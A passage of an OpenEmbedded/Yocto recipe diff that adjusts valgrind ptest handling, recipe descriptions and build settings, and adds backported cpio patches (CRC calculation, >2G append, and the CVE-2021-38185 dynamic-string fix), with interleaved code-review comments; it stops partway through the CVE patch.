diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
new file mode 100644
index 0000000000..88a11ca332
--- /dev/null
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
@@ -0,0 +1,4 @@
+drd/tests/bar_bad
+drd/tests/bar_bad_xml
+gdbserver_tests/hginfo
+memcheck/tests/linux/timerfd-syscall
diff --git a/meta/recipes-devtools/valgrind/valgrind/run-ptest b/meta/recipes-devtools/valgrind/valgrind/run-ptest
index 97b0a85dbf..7217dfca5d 100755
--- a/meta/recipes-devtools/valgrind/valgrind/run-ptest
+++ b/meta/recipes-devtools/valgrind/valgrind/run-ptest
@@ -17,6 +17,12 @@ EXP_TOOLS="exp-bbv exp-dhat exp-sgcheck"
GDB_BIN=@bindir@/gdb
cd ${VALGRIND_LIB}/ptest && ./gdbserver_tests/make_local_links ${GDB_BIN}
+echo "Hide valgrind tests that are non-deterministic"
+echo "Reported at https://bugs.kde.org/show_bug.cgi?id=430321"
+for i in `cat remove-for-all`; do
+ mv $i.vgtest $i.IGNORE;
+done
+
arch=`arch`
if [ "$arch" = "aarch64" ]; then
echo "Aarch64: Hide valgrind tests that result in defunct process and then out of memory"
@@ -44,6 +50,10 @@ if [ "$arch" = "aarch64" ]; then
done
fi
+echo "Restore valgrind tests that are non-deterministc"
+for i in `cat remove-for-all`; do
+ mv $i.IGNORE $i.vgtest;
+done
passed=`grep PASS: ${LOG}|wc -l`
failed=`grep FAIL: ${LOG}|wc -l`
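Review bot: The message added in the restore block is misspelled (`non-deterministc`); it should read `echo "Restore valgrind tests that are non-deterministic"` to match the hide message in the earlier hunk. Both new loops also leave `$i` unquoted and ignore a failed `mv`, presumably following the existing aarch64 loops. As a result, a name in remove-for-all that is missing from the tree shows up only as an error line in the ptest log. The restore loop is skipped if the script exits early between the two hunks, which would leave the listed tests renamed to `.IGNORE` in the installed ptest directory.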
diff --git a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
index a764d18177..67999e579a 100644
--- a/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
+++ b/meta/recipes-devtools/valgrind/valgrind_3.15.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Valgrind memory debugger and instrumentation framework"
HOMEPAGE = "http://valgrind.org/"
+DESCRIPTION = "Valgrind is an instrumentation framework for building dynamic analysis tools. There are Valgrind tools that can automatically detect many memory management and threading bugs, and profile your programs in detail."
BUGTRACKER = "http://valgrind.org/support/bug_reports.html"
LICENSE = "GPLv2 & GPLv2+ & BSD"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
@@ -16,6 +17,7 @@ SRC_URI = "https://sourceware.org/pub/valgrind/valgrind-${PV}.tar.bz2 \
file://Added-support-for-PPC-instructions-mfatbu-mfatbl.patch \
file://run-ptest \
file://remove-for-aarch64 \
+ file://remove-for-all \
file://0004-Fix-out-of-tree-builds.patch \
file://0005-Modify-vg_test-wrapper-to-support-PTEST-formats.patch \
file://0001-Remove-tests-that-fail-to-build-on-some-PPC32-config.patch \
@@ -105,7 +107,7 @@ VALGRINDARCH_mipsel = "mips32"
VALGRINDARCH_mips64el = "mips64"
VALGRINDARCH_powerpc = "ppc"
VALGRINDARCH_powerpc64 = "ppc64"
-VALGRINDARCH_powerpc64el = "ppc64le"
+VALGRINDARCH_powerpc64le = "ppc64le"
INHIBIT_PACKAGE_STRIP_FILES = "${PKGD}${libdir}/valgrind/vgpreload_memcheck-${VALGRINDARCH}-linux.so"
@@ -171,6 +173,7 @@ do_install_ptest() {
# The scripts reference config.h so add it to the top ptest dir.
cp ${B}/config.h ${D}${PTEST_PATH}
install -D ${WORKDIR}/remove-for-aarch64 ${D}${PTEST_PATH}
+ install -D ${WORKDIR}/remove-for-all ${D}${PTEST_PATH}
# Add an executable need by none/tests/bigcode
mkdir ${D}${PTEST_PATH}/perf
diff --git a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
index 7d27c43c83..d988e1ffce 100644
--- a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
+++ b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
@@ -1,5 +1,6 @@
SUMMARY = "A shell-script tool for converting XML files to various formats"
-HOMEPAGE = "https://releases.pagure.org/xmlto/"
+HOMEPAGE = "https://pagure.io/xmlto"
+DESCRIPTION = "Utility xmlto is a simple shell-script tool for converting XML files to various formats. It serves as easy to use command line frontend to make fine output without remembering many long options and searching for the syntax of the backends."
SECTION = "docs/xmlto"
LICENSE = "GPLv2"
@@ -29,7 +30,7 @@ RDEPENDS_${PN}_append_class-target = " \
libxslt-bin \
coreutils \
"
-CACHED_CONFIGUREVARS += "ac_cv_path_TAIL=tail"
+CACHED_CONFIGUREVARS += "ac_cv_path_TAIL=tail ac_cv_path_GREP=grep"
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
new file mode 100644
index 0000000000..14c1cd806e
--- /dev/null
+++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
@@ -0,0 +1,42 @@
+From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz>
+Date: Fri, 30 Oct 2020 15:10:35 +0100
+Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151)
+
+Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f
+
+Slightly modified to cleanly apply to asciidoc 8.6.9:
+- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9
+- line numbers corrected to eliminate offset warnings
+
+Upstream-Status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ asciidoc.py | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/asciidoc.py b/asciidoc.py
+index f960e7d8..42868c4b 100755
+--- a/asciidoc.py
++++ b/asciidoc.py
+@@ -30,7 +30,7 @@
+ # Used by asciidocapi.py #
+ VERSION = '8.6.10' # See CHANGELOG file for version history.
+
+-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better.
++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better.
+
+ # ---------------------------------------------------------------------------
+ # Program constants.
+@@ -4704,8 +4704,8 @@ def init(self, cmd):
+ directory.
+ cmd is the asciidoc command or asciidoc.py path.
+ """
+- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION):
+- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION)
++ if sys.version_info[:2] < MIN_PYTHON_VERSION:
++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION)
+ sys.exit(1)
+ if not os.path.exists(cmd):
+ message.stderr('FAILED: Missing asciidoc command: %s' % cmd)
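Review bot: Changing `MIN_PYTHON_VERSION` from the string `'3.4'` to the tuple `(3, 4)` alters the type of a module-level constant, so any other reader of it outside this hunk that still formats or parses it as a string would break. It would be worth grepping the pinned tree for other uses before relying on the backport. A comment on the constant such as `# (major, minor) tuple, compared against sys.version_info[:2]` would make the new contract explicit. The patch header says VERSION was adjusted to the 8.6.9 values while the context line reads `VERSION = '8.6.10'`; if the pinned SRCREV really carries that string the header wording is just misleading, but it should be confirmed. The body of `init` continues past the end of the inner hunk.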
diff --git a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
index 751bf0f19f..325ff9aa15 100644
--- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
+++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
@@ -8,8 +8,9 @@ LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \
file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069"
-SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https \
- file://auto-catalogs.patch"
+SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \
+ file://auto-catalogs.patch \
+ file://detect-python-version.patch"
SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0"
PV .= "+py3-git${SRCPV}"
diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc
index 1ebb33bdcd..4e6176d2e6 100644
--- a/meta/recipes-extended/bash/bash.inc
+++ b/meta/recipes-extended/bash/bash.inc
@@ -1,5 +1,6 @@
SUMMARY = "An sh-compatible command language interpreter"
HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html"
+DESCRIPTION = "Bash is the GNU Project's Bourne Again SHell, a complete implementation of the IEEE POSIX and Open Group shell specification with interactive command line editing, job control on architectures that support it, csh-like features such as history substitution and brace expansion, and a slew of other features."
SECTION = "base/shell"
DEPENDS = "ncurses bison-native virtual/libiconv"
@@ -48,6 +49,11 @@ do_compile_ptest () {
oe_runmake buildtest
}
+do_install_prepend () {
+ # Ensure determinism as this counter increases for each make call
+ rm -f ${B}/.build
+}
+
do_install_append () {
# Move /usr/bin/bash to /bin/bash, if need
if [ "${base_bindir}" != "${bindir}" ]; then
diff --git a/meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch b/meta/recipes-extended/bash/bash/CVE-2019-18276.patch
index 7b2073201e..7b2073201e 100644
--- a/meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch
+++ b/meta/recipes-extended/bash/bash/CVE-2019-18276.patch
diff --git a/meta/recipes-extended/bash/bash_5.0.bb b/meta/recipes-extended/bash/bash_5.0.bb
index 257a03bd8b..53e05869ce 100644
--- a/meta/recipes-extended/bash/bash_5.0.bb
+++ b/meta/recipes-extended/bash/bash_5.0.bb
@@ -30,7 +30,7 @@ SRC_URI = "${GNU_MIRROR}/bash/${BP}.tar.gz;name=tarball \
file://run-ptest \
file://run-bash-ptests \
file://fix-run-builtins.patch \
- file://bash-CVE-2019-18276.patch \
+ file://CVE-2019-18276.patch \
"
SRC_URI[tarball.md5sum] = "2b44b47b905be16f45709648f671820b"
diff --git a/meta/recipes-extended/bc/bc_1.07.1.bb b/meta/recipes-extended/bc/bc_1.07.1.bb
index 4a51302492..8ed10d14c2 100644
--- a/meta/recipes-extended/bc/bc_1.07.1.bb
+++ b/meta/recipes-extended/bc/bc_1.07.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Arbitrary precision calculator language"
HOMEPAGE = "http://www.gnu.org/software/bc/bc.html"
+DESCRIPTION = "bc is an arbitrary precision numeric processing language. Syntax is similar to C, but differs in many substantial areas. It supports interactive execution of statements."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
@@ -31,4 +32,4 @@ do_compile_prepend() {
ALTERNATIVE_${PN} = "bc dc"
ALTERNATIVE_PRIORITY = "100"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am
index dcf64584d9..adc85a62b2 100644
--- a/meta/recipes-extended/bzip2/bzip2/Makefile.am
+++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am
@@ -1,6 +1,6 @@
lib_LTLIBRARIES = libbz2.la
-libbz2_la_LDFLAGS = -version-info 1:6:0
+libbz2_la_LDFLAGS = -version-info 1:8:0
libbz2_la_SOURCES = blocksort.c \
huffman.c \
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
new file mode 100644
index 0000000000..2dfd348d7c
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
@@ -0,0 +1,58 @@
+From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 7 Apr 2023 11:23:37 +0300
+Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode.
+
+* src/copyout.c (read_for_checksum): Fix type of the file_size argument.
+Rewrite the reading loop.
+
+Original patch by Stefano Babic <sbabic@denx.de>
+
+Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/copyout.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..f1ff351 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -34,27 +34,25 @@
+ compute and return a checksum for them. */
+
+ static uint32_t
+-read_for_checksum (int in_file_des, int file_size, char *file_name)
++read_for_checksum (int in_file_des, off_t file_size, char *file_name)
+ {
+ uint32_t crc;
+- char buf[BUFSIZ];
+- int bytes_left;
+- int bytes_read;
+- int i;
++ unsigned char buf[BUFSIZ];
++ ssize_t bytes_read;
++ ssize_t i;
+
+ crc = 0;
+
+- for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read)
++ while (file_size > 0)
+ {
+ bytes_read = read (in_file_des, buf, BUFSIZ);
+ if (bytes_read < 0)
+ error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+ if (bytes_read == 0)
+ break;
+- if (bytes_left < bytes_read)
+- bytes_read = bytes_left;
+- for (i = 0; i < bytes_read; ++i)
++ for (i = 0; i < bytes_read; i++)
+ crc += buf[i] & 0xff;
++ file_size -= bytes_read;
+ }
+ if (lseek (in_file_des, 0L, SEEK_SET))
+ error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+--
+2.39.2
+
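Review bot: The rewritten loop in `read_for_checksum` no longer clamps the final block to the remaining size, so if the file grows between the size being taken and this read, the sum covers bytes beyond `file_size`. The removed `if (bytes_left < bytes_read) bytes_read = bytes_left;` did that clamping. The new loop could keep the bound by limiting the request instead, `bytes_read = read (in_file_des, buf, file_size < BUFSIZ ? (size_t) file_size : BUFSIZ);`. Presumably the archive header still records the original size, in which case the stored CRC would not match on verification; confirm against the caller. The function continues past the inner hunk, and because this is an upstream backport the change would need to go upstream first.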
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
new file mode 100644
index 0000000000..c212bddf7d
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
@@ -0,0 +1,312 @@
+From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 28 Apr 2023 15:23:46 +0300
+Subject: [PATCH 4/4] Fix appending to archives bigger than 2G
+
+* src/extern.h (last_header_start): Change type to off_t.
+* src/global.c: Likewise.
+* src/util.c (prepare_append): Use off_t for file offsets.
+
+Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/extern.h | 11 ++++-----
+ src/global.c | 2 +-
+ src/util.c | 66 ++++++++++++++++++++++++++--------------------------
+ 3 files changed, 39 insertions(+), 40 deletions(-)
+
+diff --git a/src/extern.h b/src/extern.h
+index 11ac6bf..12f14a9 100644
+--- a/src/extern.h
++++ b/src/extern.h
+@@ -67,7 +67,7 @@ extern int ignore_devno_option;
+
+ extern bool to_stdout_option;
+
+-extern int last_header_start;
++extern off_t last_header_start;
+ extern int copy_matching_files;
+ extern int numeric_uid;
+ extern char *pattern_file_name;
+@@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname,
+
+ /* copypass.c */
+ void process_copy_pass (void);
+-int link_to_maj_min_ino (char *file_name, int st_dev_maj,
++int link_to_maj_min_ino (char *file_name, int st_dev_maj,
+ int st_dev_min, ino_t st_ino);
+ int link_to_name (char const *link_name, char const *link_target);
+
+@@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes);
+ void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename);
+ void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename);
+ void warn_if_file_changed (char *file_name, off_t old_file_size,
+- time_t old_file_mtime);
++ time_t old_file_mtime);
+ void create_all_directories (char const *name);
+ void prepare_append (int out_file_des);
+ char *find_inode_file (ino_t node_num,
+@@ -185,7 +185,7 @@ void set_new_media_message (char *message);
+ #ifdef HPUX_CDF
+ char *add_cdf_double_slashes (char *filename);
+ #endif
+-void write_nuls_to_file (off_t num_bytes, int out_des,
++void write_nuls_to_file (off_t num_bytes, int out_des,
+ void (*writer) (char *in_buf,
+ int out_des, off_t num_bytes));
+ #define DISK_IO_BLOCK_SIZE 512
+@@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st,
+ mode_t invert_permissions);
+ int repair_delayed_set_stat (struct cpio_file_stat *file_hdr);
+ void apply_delayed_set_stat (void);
+-
+-int arf_stores_inode_p (enum archive_format arf);
+
++int arf_stores_inode_p (enum archive_format arf);
+diff --git a/src/global.c b/src/global.c
+index fb3abe9..5c9fc05 100644
+--- a/src/global.c
++++ b/src/global.c
+@@ -114,7 +114,7 @@ int debug_flag = false;
+
+ /* File position of last header read. Only used during -A to determine
+ where the old TRAILER!!! record started. */
+-int last_header_start = 0;
++off_t last_header_start = 0;
+
+ /* With -i; if true, copy only files that match any of the given patterns;
+ if false, copy only files that do not match any of the patterns. (-f) */
+diff --git a/src/util.c b/src/util.c
+index 4421b20..3be89a4 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des)
+ static long output_bytes_before_lseek = 0;
+
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (output_is_special
+ && ( (output_bytes_before_lseek += output_size) >= 1073741824L) )
+@@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush);
+ descriptor OUT_DES and reset `output_size' and `out_buff'.
+ If `swapping_halfwords' or `swapping_bytes' is set,
+ do the appropriate swapping first. Our callers have
+- to make sure to only set these flags if `output_size'
++ to make sure to only set these flags if `output_size'
+ is appropriate (a multiple of 4 for `swapping_halfwords',
+ 2 for `swapping_bytes'). The fact that DISK_IO_BLOCK_SIZE
+ must always be a multiple of 4 helps us (and our callers)
+@@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes)
+ {
+ #ifdef BROKEN_LONG_TAPE_DRIVER
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (input_is_special
+ && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes)
+
+ #ifdef BROKEN_LONG_TAPE_DRIVER
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (input_is_special
+ && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes)
+
+ if (crc_i_flag && only_verify_crc_flag)
+ {
+- int k;
++ int k;
+ for (k = 0; k < space_left; ++k)
+ crc += in_buff[k] & 0xff;
+ }
+@@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes)
+ }
+
+ void
+-write_nuls_to_file (off_t num_bytes, int out_des,
+- void (*writer) (char *in_buf, int out_des, off_t num_bytes))
++write_nuls_to_file (off_t num_bytes, int out_des,
++ void (*writer) (char *in_buf, int out_des, off_t num_bytes))
+ {
+ off_t blocks;
+ off_t extra_bytes;
+ off_t i;
+ static char zeros_512[512];
+-
++
+ blocks = num_bytes / sizeof zeros_512;
+ extra_bytes = num_bytes % sizeof zeros_512;
+ for (i = 0; i < blocks; ++i)
+@@ -603,7 +603,7 @@ create_all_directories (char const *name)
+ char *dir;
+
+ dir = dir_name (name);
+-
++
+ if (dir == NULL)
+ error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted"));
+
+@@ -637,9 +637,9 @@ create_all_directories (char const *name)
+ void
+ prepare_append (int out_file_des)
+ {
+- int start_of_header;
+- int start_of_block;
+- int useful_bytes_in_block;
++ off_t start_of_header;
++ off_t start_of_block;
++ size_t useful_bytes_in_block;
+ char *tmp_buf;
+
+ start_of_header = last_header_start;
+@@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2)
+ const struct inode_val *ival1 = val1;
+ const struct inode_val *ival2 = val2;
+ return ival1->inode == ival2->inode
+- && ival1->major_num == ival2->major_num
+- && ival1->minor_num == ival2->minor_num;
++ && ival1->major_num == ival2->major_num
++ && ival1->minor_num == ival2->minor_num;
+ }
+
+ static struct inode_val *
+@@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num,
+ unsigned long minor_num)
+ {
+ struct inode_val sample;
+-
++
+ if (!hash_table)
+ return NULL;
+-
++
+ sample.inode = node_num;
+ sample.major_num = major_num;
+ sample.minor_num = minor_num;
+@@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num,
+ {
+ struct inode_val *temp;
+ struct inode_val *e = NULL;
+-
++
+ /* Create new inode record. */
+ temp = (struct inode_val *) xmalloc (sizeof (struct inode_val));
+ temp->inode = node_num;
+@@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize)
+
+ /* Write NBYTE bytes from BUF to file descriptor FILDES, trying to
+ create holes instead of writing blockfuls of zeros.
+-
++
+ Return the number of bytes written (including bytes in zero
+ regions) on success, -1 on error.
+
+@@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+
+ enum { begin, in_zeros, not_in_zeros } state =
+ delayed_seek_count ? in_zeros : begin;
+-
++
+ while (nbytes)
+ {
+ size_t rest = nbytes;
+@@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+ if (state == not_in_zeros)
+ {
+ ssize_t bytes = buf - start_ptr + rest;
+-
++
+ n = write (fildes, start_ptr, bytes);
+ if (n == -1)
+ return -1;
+@@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+ if (n != 1)
+ return n;
+ delayed_seek_count = 0;
+- }
+-
++ }
++
+ return nwritten + seek_count;
+ }
+
+@@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header)
+ if (!no_chown_flag)
+ {
+ uid_t uid = CPIO_UID (header->c_uid);
+- gid_t gid = CPIO_GID (header->c_gid);
++ gid_t gid = CPIO_GID (header->c_gid);
+ if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0)
+ && errno != EPERM)
+ chown_error_details (header->c_name, uid, gid);
+@@ -1239,13 +1239,13 @@ set_file_times (int fd,
+ const char *name, unsigned long atime, unsigned long mtime)
+ {
+ struct timespec ts[2];
+-
++
+ memset (&ts, 0, sizeof ts);
+
+ ts[0].tv_sec = atime;
+ ts[1].tv_sec = mtime;
+
+- /* Silently ignore EROFS because reading the file won't have upset its
++ /* Silently ignore EROFS because reading the file won't have upset its
+ timestamp if it's on a read-only filesystem. */
+ if (fdutimens (fd, name, ts) < 0 && errno != EROFS)
+ utime_error (name);
+@@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names,
+
+ /* This is a simplified form of delayed set_stat used by GNU tar.
+ With the time, both forms will merge and pass to paxutils
+-
++
+ List of directories whose statuses we need to extract after we've
+ finished extracting their subsidiary files. If you consider each
+ contiguous subsequence of elements of the form [D]?[^D]*, where [D]
+@@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed)
+ {
+ int rc;
+ mode_t mode = file_hdr->c_mode;
+-
++
+ if (!(file_hdr->c_mode & S_IWUSR))
+ {
+ rc = mkdir (file_hdr->c_name, mode | S_IWUSR);
+@@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir)
+ {
+ int res; /* Result of various function calls. */
+ int setstat_delayed = 0;
+-
++
+ if (to_stdout_option)
+ return 0;
+-
++
+ /* Strip any trailing `/'s off the filename; tar puts
+ them on. We might as well do it here in case anybody
+ else does too, since they cause strange things to happen. */
+@@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf)
+ }
+ return 1;
+ }
+-
++
+ void
+ cpio_file_stat_init (struct cpio_file_stat *file_hdr)
+ {
+--
+2.39.2
+
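Review bot: The whitespace-only hunks carried in this backport (in `write_nuls_to_file`, `sparse_write`, `cpio_create_dir`, `set_perms` and others) bury the functional change, which is limited to `last_header_start` in extern.h and global.c and the three locals in `prepare_append`. They also make the patch more likely to conflict with other patches to src/util.c in the same directory, such as CVE-2021-38185.patch, whose diffstat lists src/util.c as well, so the order in SRC_URI matters. The body of `prepare_append` lies outside the inner hunk, so whether `useful_bytes_in_block` as `size_t` mixes safely with the `off_t` offsets cannot be checked from here. A line in the patch header such as `Includes upstream whitespace cleanup; functional change is off_t for append offsets` would help the next reader.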
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
new file mode 100644
index 0000000000..6ceafeee49
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
@@ -0,0 +1,581 @@
+GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted
+pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers
+an out-of-bounds heap write.
+
+CVE: CVE-2021-38185
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 7 Aug 2021 12:52:21 +0300
+Subject: [PATCH 1/3] Rewrite dynamic string support.
+
+* src/dstring.c (ds_init): Take a single argument.
+(ds_free): New function.
+(ds_resize): Take a single argument. Use x2nrealloc to expand
+the storage.
+(ds_reset,ds_append,ds_concat,ds_endswith): New function.
+(ds_fgetstr): Rewrite. In particular, this fixes integer overflow.
+* src/dstring.h (dynamic_string): Keep both the allocated length
+(ds_size) and index of the next free byte in the string (ds_idx).
+(ds_init,ds_resize): Change signature.
+(ds_len): New macro.
+(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos.
+* src/copyin.c: Use new ds_ functions.
+* src/copyout.c: Likewise.
+* src/copypass.c: Likewise.
+* src/util.c: Likewise.
+---
+ src/copyin.c | 40 +++++++++++------------
+ src/copyout.c | 16 ++++-----
+ src/copypass.c | 34 +++++++++----------
+ src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++--------------
+ src/dstring.h | 31 +++++++++---------
+ src/util.c | 6 ++--
+ 6 files changed, 123 insertions(+), 92 deletions(-)
+
+diff --git a/src/copyin.c b/src/copyin.c
+index b29f348..37e503a 100644
+--- a/src/copyin.c
++++ b/src/copyin.c
+@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out,
+ char *str_res; /* Result for string function. */
+ static dynamic_string new_name; /* New file name for rename option. */
+ static int initialized_new_name = false;
++
+ if (!initialized_new_name)
+- {
+- ds_init (&new_name, 128);
+- initialized_new_name = true;
+- }
++ {
++ ds_init (&new_name);
++ initialized_new_name = true;
++ }
+
+ if (rename_flag)
+ {
+@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name)
+ already in `save_patterns' (from the command line) are preserved. */
+
+ static void
+-read_pattern_file ()
++read_pattern_file (void)
+ {
+- int max_new_patterns;
+- char **new_save_patterns;
+- int new_num_patterns;
++ char **new_save_patterns = NULL;
++ size_t max_new_patterns;
++ size_t new_num_patterns;
+ int i;
+- dynamic_string pattern_name;
++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER;
+ FILE *pattern_fp;
+
+ if (num_patterns < 0)
+ num_patterns = 0;
+- max_new_patterns = 1 + num_patterns;
+- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *));
+ new_num_patterns = num_patterns;
+- ds_init (&pattern_name, 128);
++ max_new_patterns = num_patterns;
++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0]));
+
+ pattern_fp = fopen (pattern_file_name, "r");
+ if (pattern_fp == NULL)
+ open_fatal (pattern_file_name);
